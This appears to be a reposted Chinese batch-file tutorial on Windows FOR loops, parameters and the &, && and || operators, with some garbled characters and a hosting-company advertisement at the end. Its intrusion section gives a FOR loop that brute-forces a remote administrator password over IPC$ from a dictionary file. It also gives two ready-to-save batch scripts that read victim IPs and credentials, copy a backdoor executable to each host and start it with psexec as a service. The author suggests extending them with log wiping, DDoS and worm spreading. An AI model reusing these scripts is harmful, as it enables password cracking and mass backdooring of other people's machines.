|
法是���,用單引號將括號之間的 filenameset 括起來。
這樣�����,該字符串會被當作一個文件中的一個單一輸入行�����。
最后���,您可以用 FOR /F 命令來分析命令的輸出。方法是�����,將括號之間的 filenameset 變成一個反括字符
串。該字符串會被當作命令行��,傳遞到一個子 CMD.EXE�����,其輸出會被抓進內(nèi)存����,并被當作文件分析。因此
�,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉當前環(huán)境中的環(huán)境變量名稱。
另外�����,F(xiàn)OR 變量參照的替換已被增強�����。您現(xiàn)在可以使用下列選項語法:
~I - 刪除任何引號(")�,擴充 %I
%~fI - 將 %I 擴充到一個完全合格的路徑名
%~dI - 僅將 %I 擴充到一個驅(qū)動器號
%~pI - 僅將 %I 擴充到一個路徑
%~nI - 僅將 %I 擴充到一個文件名
%~xI - 僅將 %I 擴充到一個文件擴展名
%~sI - 擴充的路徑只含有短名
%~aI - 將 %I 擴充到文件的文件屬性
%~tI - 將 %I 擴充到文件的日期/時間
%~zI - 將 %I 擴充到文件的大小
%~$PATH:I - 查找列在路徑環(huán)境變量的目錄,并將 %I 擴充到找到的第一個完全合格的名稱�����。如果環(huán)境變
量未被定義,或者沒有找到文件���,此組合鍵會擴充空字符串
可以組合修飾符來得到多重結(jié)果:
%~dpI - 僅將 %I 擴充到一個驅(qū)動器號和路徑
%~nxI - 僅將 %I 擴充到一個文件名和擴展名
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名
%~dp$PATH:i - 查找列在路徑環(huán)境變量的目錄����,并將 %I 擴充到找到的第一個驅(qū)動器號和路徑�����。
%~ftzaI - 將 %I 擴充到類似輸出線路的 DIR
在以上例子中���,%I 和 PATH 可用其他有效數(shù)值代替��。%~ 語法用一個有效的 FOR 變量名終止�����。選取類似
%I 的大寫變量名比較易讀,而且避免與不分大小寫的組合鍵混淆����。
以上是MS的官方幫助��,下面我們舉幾個例子來具體說明一下For命令在入侵中的用途��。
sample2:
利用For命令來實現(xiàn)對一臺目標Win2k主機的暴力密碼破解�����。
我們用net use \\ip\ipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接�,當成功時記下
密碼����。
最主要的命令是一條:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%來表示admin的密碼,在dict.txt中這個取i%的值用net use 命令來連接��。然后將程序運行結(jié)果傳遞給
find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"│find ":命令成功完
成">>D:\ok.txt ����,這樣就ko了。
sample3:
你有沒有過手里有大量肉雞等著你去種后門+木馬呢���?����,當數(shù)量特別多的時候�����,原本很開心的一件事都會
變得很郁悶:)。文章開頭就談到使用批處理文件����,可以簡化日常或重復性任務(wù)��。那么如何實現(xiàn)呢�����?呵呵
��,看下去你就會明白了���。
主要命令也只有一條:(在批處理文件中使用 FOR 命令時�����,指定變量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1��,在這里它表示按順序?qū)ictim.txt中的內(nèi)容傳遞給door.bat中的參數(shù)
%i %j %k。
而cultivate.bat無非就是用net use命令來建立IPC$連接���,并copy木馬+后門到victim���,然后用返回碼
(If errorlever =)來篩選成功種植后門的主機����,并echo出來���,或者echo到指定的文件��。
delims= 表示vivtim.txt中的內(nèi)容是一空格來分隔的��。我想看到這里你也一定明白這victim.txt里的內(nèi)容
是什么樣的了����。應(yīng)該根據(jù)%%i %%j %%k表示的對象來排列�,一般就是 ip password username。
代碼雛形:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
------------------- cut here then save as a batchfile(I call it door.bat) ------------------
-----------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3
>>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------
------------
這只是一個自動種植后門批處理的雛形����,兩個批處理和后門程序(Windrv32.exe),PSexec.exe需放在統(tǒng)一
目錄下.批處理內(nèi)容
尚可擴展,例如:加入清除日志+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功
能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.
二.如何在批處理文件中使用參數(shù)
批處理中可以使用參數(shù),一般從1%到 9%這九個����,當有多個參數(shù)時需要用shift來移動�,這種情況并不多見
����,我們就不考慮它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
這個例子用于連續(xù)地格式化幾張軟盤���,所以用的時候需在dos窗口輸入fomat.bat a����,呵呵,好像有點畫蛇添
足了~
sample2:
當我們要建立一個IPC$連接地時候總要輸入一大串命令���,弄不好就打錯了�,所以我們不如把一些固定命令
寫入一個批處理��,把肉雞地ip password username 當著參數(shù)來賦給這個批處理���,這樣就不用每次都打命令
了�����。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦�����,這里PASSWORD是第二個參數(shù)��。
@if errorlevel 1 echo connection failed
怎么樣,使用參數(shù)還是比較簡單的吧���?你這么帥一定學會了.No.3
三.如何使用組合命令(Compound Command)
1.&
Usage:第一條命令 & 第二條命令 [& 第三條命令...]
用這種方法可以同時執(zhí)行多條命令,而不管命令是否執(zhí)行成功
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage:第一條命令 && 第二條命令 [&& 第三條命令...]
用這種方法可以同時執(zhí)行多條命令�����,當碰到執(zhí)行出錯的命令后將不執(zhí)行后面的命令����,如果一直沒有出錯則
一直執(zhí)行完所有命令;
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
在做備份的時候可能會用到這種命令會比較簡單�,如:
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb
E:\backup
如果遠程服務(wù)器上存在backup.mdb文件,就執(zhí)行copy命令���,若不存在該文件則不執(zhí)行copy命令�。這種用法
可以替換IF exist了.
3.││
Usage:第一條命令 ││ 第二條命令 [││ 第三條命令...]
用這種方法可以同時執(zhí)行多條命令����,當碰到執(zhí)行正確的命令后將不執(zhí)行后面的命令,如果沒有出現(xiàn)正確的
命令則一直執(zhí)行完所有命令;
Sample:
C:\Ex4rch>dir sometips.gif ││ del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
組合命令使用的例子:
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【www.yaz797.com】
服務(wù)器租用/服務(wù)器托管中國五強��!虛擬主機域名注冊頂級提供商���!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國服務(wù)器租用
電信骨干機房
聯(lián)通骨干機房
0371-60135900
